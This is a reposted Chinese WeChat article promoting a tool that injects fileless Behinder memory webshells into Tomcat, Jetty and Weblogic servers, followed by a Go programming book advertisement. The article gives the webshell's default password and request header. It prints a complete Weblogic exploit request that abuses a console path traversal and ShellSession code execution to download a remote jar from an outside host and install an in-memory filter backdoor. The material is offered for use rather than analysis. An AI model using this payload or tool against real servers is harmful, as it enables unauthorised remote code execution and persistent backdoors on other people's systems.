===================================
0x01 工具介绍
支持常见中间件无文件落地冰蝎内存马注入&&文件上传代理冰蝎马注入。
0x02 安装与使用
冰蝎默认密码Crilwa,添加请请求头D0g3:xxx
1、代码执行,例如可以使用URLClassLoader远程程序添加加载类,便可以将无文件落入本地存储马。目前支持:
Tomcat6789回显,Tomcat6789冰蝎马Jetty回显,Jetty冰蝎马Weblogic冰蝎马
2、JavaAgent注册(需要文件落地,暂时只支持linux,目前没有实际冰蜘蛛payload,只支持Tomcat回显)
3、下面的payload,可以进行代码执行,加载远程恶意代码。
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.net.URLClassLoader u = new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("http://192.168.220.1:8000/MemShell-1.0-SNAPSHOT.jar")});u.loadClass("Inject.WeblogicInjectFilterShell").newInstance(); u.close();"); HTTP/1.10x03 项目链接下载
· 今 日 送 书 ·
本书是一本来自一线开发者的Go语言编程入门书,深入浅出地讲述了Go语言的语法特性和编程实践,全书分为基础和项目两部分,基础部分主要介绍Go语言开发环境的搭建、基础语法、数据类型、指针、内置容器、函数、结构体、接口、反射、并发编程、包的应用与管理、目录与文件管理、时间管理、数据库编程等,项目部分主要介绍网页自动化测试程序、网络爬虫程序、网络信息反馈网站的开发实践,此外,还介绍了Go语言程序的编译方法。
又到了金三银四跳槽季,要在跳槽大军中脱颖而出逆势而上,技术神书不可少。很高兴携手清华大学出版社为大家发福利,3.23-24日点击链接参与#清华社IT图书-程序设计专场#,全场5折封顶,领券再满150-15。
扫描二维码,进入购书链接:
文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247507955&idx=1&sn=5eca2bdf388493b3f47d9d17034c1b84&chksm=ebb530f0dcc2b9e6d7573e8ccfd54033b6cf8f762c644b87af2f283bddc82dbaf454a064d7f2#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh